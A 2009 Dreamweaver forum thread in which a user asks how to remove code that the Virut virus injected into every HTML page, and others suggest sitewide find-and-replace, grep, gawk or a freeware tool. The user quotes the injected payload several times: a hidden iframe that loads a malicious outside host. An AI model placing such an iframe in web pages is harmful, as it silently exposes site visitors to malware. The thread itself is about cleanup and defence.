HighDots Forums  

Virus infestation

Macromedia Dreamweaver Macromedia Dreamweaver Discussions (macromedia.dreamweaver)


Discuss Virus infestation in the Macromedia Dreamweaver forum.



Reply
 
Thread Tools Display Modes
  #1  
Old   
JayJay
 
Posts: n/a

Default Virus infestation - 03-30-2009 , 04:12 AM






Hi...

Got hit with a really mean virus - Virut. Apart from attaching itself to
all - repeat all - exe and other files it also embeds itself in html pages.
And here's the kicker... it's in all the pages on all the sites in my
system. Here's the code it puts in:

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Normally, a simple find and replace from DW would clear it but it's in the
non-editable regions of files from templates. The templates themselves are
clean... so not sure how to go about it... opening each file in notepad an
editing it there will drive me mad! Any suggestions?

TIA,

JJ



Reply With Quote
  #2  
Old   
JayJay
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 05:57 AM







"JayJay" wrote:

Quote:
Got hit with a really mean virus - Virut. Apart from attaching itself to
all - repeat all - exe and other files it also embeds itself in html
pages. And here's the kicker... it's in all the pages on all the sites in
my system. Here's the code it puts in:

iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe

Normally, a simple find and replace from DW would clear it but it's in the
non-editable regions of files from templates. The templates themselves are
clean... so not sure how to go about it... opening each file in notepad an
editing it there will drive me mad! Any suggestions?
Ok... solved it.... just opened and resaved each template... malignant code
removed from child pages...

However, one has tonnes of .htm and .html pages floating around... anyone
know of a good - preferably free - utility that can snoop thru all the files
and remove this code wherever it's found?

TIA,

JJ




Reply With Quote
  #3  
Old   
Murray *ACE*
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 07:03 AM



With all files closed, do a sitewide find and replace. It'll get it even in
noneditable regions.

--
Murray --- ICQ 71997575
Adobe Community Expert
(If you *MUST* email me, don't LAUGH when you do so!)
==================
http://www.projectseven.com/go - DW FAQs, Tutorials & Resources
http://www.dwfaq.com - DW FAQs, Tutorials & Resources
==================


"JayJay" <jhabrix (AT) yahoo (DOT) com> wrote

Quote:
Hi...

Got hit with a really mean virus - Virut. Apart from attaching itself to
all - repeat all - exe and other files it also embeds itself in html
pages. And here's the kicker... it's in all the pages on all the sites in
my system. Here's the code it puts in:

iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe

Normally, a simple find and replace from DW would clear it but it's in the
non-editable regions of files from templates. The templates themselves are
clean... so not sure how to go about it... opening each file in notepad an
editing it there will drive me mad! Any suggestions?

TIA,

JJ



Reply With Quote
  #4  
Old   
JayJay
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 07:20 AM



"Murray *ACE*" wrote:
Quote:
With all files closed, do a sitewide find and replace. It'll get it even
in noneditable regions.
OK... thanks... took the longer route of re-saving the templates Didn't
realise that the find and replace will work even in non-editable regions on
a closed template-child.

Any good program to root out the problem in all the other html files on my
system? Non DW site files...

Cheers,

JJ






Reply With Quote
  #5  
Old   
Murray *ACE*
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 07:22 AM



Grep would do it, I believe....

--
Murray --- ICQ 71997575
Adobe Community Expert
(If you *MUST* email me, don't LAUGH when you do so!)
==================
http://www.projectseven.com/go - DW FAQs, Tutorials & Resources
http://www.dwfaq.com - DW FAQs, Tutorials & Resources
==================


"JayJay" <jhabrix (AT) yahoo (DOT) com> wrote

Quote:
"Murray *ACE*" wrote:
With all files closed, do a sitewide find and replace. It'll get it even
in noneditable regions.

OK... thanks... took the longer route of re-saving the templates Didn't
realise that the find and replace will work even in non-editable regions
on a closed template-child.

Any good program to root out the problem in all the other html files on my
system? Non DW site files...

Cheers,

JJ






Reply With Quote
  #6  
Old   
Michael White
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 07:57 AM



JayJay wrote:
Quote:
"Murray *ACE*" wrote:
With all files closed, do a sitewide find and replace. It'll get it even
in noneditable regions.

OK... thanks... took the longer route of re-saving the templates Didn't
realise that the find and replace will work even in non-editable regions on
a closed template-child.

Any good program to root out the problem in all the other html files on my
system? Non DW site files...

Cheers,

JJ

You can use DW's F & R. Select the top level folder in your system.

Mick.


Reply With Quote
  #7  
Old   
Joe Makowiec
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 08:18 AM



On 30 Mar 2009 in macromedia.dreamweaver, Murray *ACE* wrote:

Quote:
Grep would do it, I believe....
grep will find 'em... You need something like [g]awk to do the actual
edit.

http://www.gnu.org/software/gawk/manual/gawk.html

--
Joe Makowiec
http://makowiec.net/
Email: http://makowiec.net/contact.php


Reply With Quote
  #8  
Old   
Mad Dog
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 08:29 AM



Check out http://www.trustmeher.net/freeware/prexa/prexa2.htm

MD


JayJay wrote:
Quote:
"Murray *ACE*" wrote:
With all files closed, do a sitewide find and replace. It'll get it
even in noneditable regions.

OK... thanks... took the longer route of re-saving the templates
Didn't realise that the find and replace will work even in
non-editable regions on a closed template-child.

Any good program to root out the problem in all the other html files
on my system? Non DW site files...

Cheers,

JJ



Reply With Quote
  #9  
Old   
Murray *ACE*
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 08:35 AM



Good point.

--
Murray --- ICQ 71997575
Adobe Community Expert
(If you *MUST* email me, don't LAUGH when you do so!)
==================
http://www.projectseven.com/go - DW FAQs, Tutorials & Resources
http://www.dwfaq.com - DW FAQs, Tutorials & Resources
==================


"Michael White" <mwhite13 (AT) rochester (DOT) rr.com> wrote

Quote:
JayJay wrote:
"Murray *ACE*" wrote:
With all files closed, do a sitewide find and replace. It'll get it
even in noneditable regions.

OK... thanks... took the longer route of re-saving the templates
Didn't realise that the find and replace will work even in non-editable
regions on a closed template-child.

Any good program to root out the problem in all the other html files on
my system? Non DW site files...

Cheers,

JJ

You can use DW's F & R. Select the top level folder in your system.

Mick.


Reply With Quote
  #10  
Old   
JayJay
 
Posts: n/a

Default Re: Virus infestation - 03-30-2009 , 08:47 AM



"Michael White" wrote:

Quote:
You can use DW's F & R. Select the top level folder in your system.

Mick.
Brilliant! Done and cleaned...

Thanks tonnes...

JJ




Reply With Quote
Reply




Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off



Powered by vBulletin Version 3.5.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.